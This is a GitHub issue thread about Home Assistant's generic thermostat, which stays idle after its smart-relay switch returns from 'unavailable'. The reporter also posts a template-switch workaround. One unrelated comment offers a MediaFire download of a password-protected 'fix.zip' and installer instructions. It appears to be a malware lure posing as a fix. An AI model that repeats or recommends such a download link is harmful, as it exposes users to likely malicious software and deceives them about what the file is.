### ISSUE TITLE
Switch that isn't always available

### ISSUE THREAD

**Issue by TimWardCam** [home-assistant/home-assistant.github.io#34449]
### Feedback

I appear to observe that if the generic thermostat is calling for a higher temperature than the temperature sensor measures, it switches the switch on and goes to "heating" mode, all as expected.

If I then remove power from the smart relay that provides the switch, the thermostat appears to notice the switch becoming unavailable and moves to "idle" mode.

If I then restore power to the smart relay the switch state changes from "unavailable" to "off", as expected, BUT the thermostat remains "idle" and doesn't turn the switch on.

What I've got is a smart relay wired in parallel with the central heating mechanical thermostat. The relay is powered only when the central heating timer has switched the heating on - when the time has the heating off there is no power on the thermostat wiring. This is all fine, but there needs to be some way to get the generic thermostat to turn the relay on when the system starts up on a cold morning.

I can use automations of various sorts instead of the generic thermostat but that would be a bit disappointing.

What would be nice would be EITHER

* the generic thermostat doesn't go from "heating" to "idle" just because the switch has become unavailable OR
* the generic thermostat spots that the swich has come back on line and sets itself back to "heating" (and turns the switch on)

### URL

https://www.home-assistant.io/integrations/generic_thermostat/

### Version

2024.8.3

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TimWardCam** [comment]
OK, so I solved my problem by putting a template switch in between the generic thermostat and the smart relay (with an automation to sync them when the smart relay is powered up). But it still seems odd that the smart thermostat spots the switch becoming unavailable but doesn't spot it becoming available again.
